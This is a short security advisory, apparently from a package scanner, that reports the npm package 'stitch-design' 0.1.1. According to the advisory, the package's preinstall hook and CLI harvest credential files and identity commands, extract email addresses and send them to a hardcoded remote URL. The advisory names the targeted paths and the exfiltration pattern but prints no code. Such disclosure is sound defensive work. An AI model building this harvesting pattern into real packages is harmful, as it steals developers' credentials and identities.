stitch-design @0.1.1

Summary

The npm package ships a preinstall lifecycle hook (scripts/preinstall.js) that, on npm install , reads classic installer-secret paths — ~/.gitconfig, ~/.git-credentials, ~/.ssh/*.pub, ~/.npmrc, ~/.docker/config.json — and runs subprocesses ( git config --global/--system user.email , gh api user , claude auth status , npm config get email ) to capture identity material. It regex-extracts every email-shaped string from the contents and issues HTTPS GETs to https://stitch-design.ai/api/v1?src=...&user=<email> for each match, with TLS verification explicitly disabled ( rejectUnauthorized: false ). The same harvester is duplicated in bin/cli.js (the package's bin entry stitch-design ), so every CLI invocation after install repeats the credential-path reads and exfiltration. Both files carry cover-story comments claiming to be a temporary placeholder that just prints a notice, while ~150 lines of harvesting and exfil code execute first. The combination of preinstall auto-execution, reads from canonical credential paths, hardcoded remote destination, disabled TLS verification, and a misleading placeholder narrative is an unambiguous installer-side credential exfiltration attack.

Source: amazon-inspector (81a0c5de3abe7924f58304e27e1537821c217c9348c060b31c5424407f9f10cc)